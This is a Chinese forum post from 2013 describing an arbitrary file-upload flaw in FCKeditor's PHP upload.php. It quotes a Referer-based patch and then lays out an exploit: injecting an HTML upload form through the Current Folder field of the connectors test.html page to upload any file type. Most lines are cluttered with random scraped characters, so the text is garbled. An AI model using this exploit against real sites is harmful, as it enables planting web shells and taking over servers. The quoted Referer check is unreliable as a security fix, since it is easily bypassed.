漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
5 M2 b6 _& }+ w7 a. \网上给出的修复方案是
6 a+ S/ U- |3 H/ A& s8 c9 [修复方法,删除FCK编辑器用其他的编辑器
! \ F0 `2 o" v* I4 }, G或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件' I8 a; u( s, N- G1 p& n9 t
在
& @9 H9 `0 Y) e# ?require(‘config.php’);
6 k& z# B8 M* |, f7 l2 j' i' [8 N2 wrequire(‘util.php’);
7 t6 r/ L/ V+ U& N3 D的下面添加以下代码—————————–
8 V5 s9 v6 T- d3 R/ Y9 A//防止外部提交
& C! U5 w9 c0 l. lfunction outsidepost()9 R" K2 q3 F' n6 l3 h9 o
{5 E& t; A8 o4 w1 _
$servername=$_SERVER['SERVER_NAME'];
% E$ T) s! G1 a9 @( `+ I" h" l$sub_from=@$_SERVER['HTTP_REFERER'];# D% H) x8 }* ^% C+ w3 \7 ^3 o
$sub_len=strlen($servername);9 N8 M5 {( @3 v5 d8 w9 Y% G5 m
$checkfrom=substr($sub_from,7,$sub_len);
) Y3 u" K! x+ s% q) fif($checkfrom!=$servername){/ n, F6 K k& `& e) Y& J' G5 Z( E
echo(“you don’t outsidepost!”);; @$ W" c/ B9 s7 g% H
exit;
0 G$ H/ N6 L0 L) l4 Q' g% v}/ g) r5 W2 \3 z3 O
}* b2 [$ S& a$ f! T9 p' c
outsidepost();
9 G1 B/ N4 }- S1 U' I7 k防止外部提交,但是没有防止内部提交,* V1 A$ P" x( Y: O8 u6 B6 S
利用方法:
' t0 K4 X3 a. a1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
5 Z6 B6 A6 c6 `$ ~# p* Y2,在Current Folder 框输入
( w1 H& Y) E* |* f<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>& I6 c8 H7 q- _$ R5 h
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
. F$ w3 n) }8 n1 f+ S e% \PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对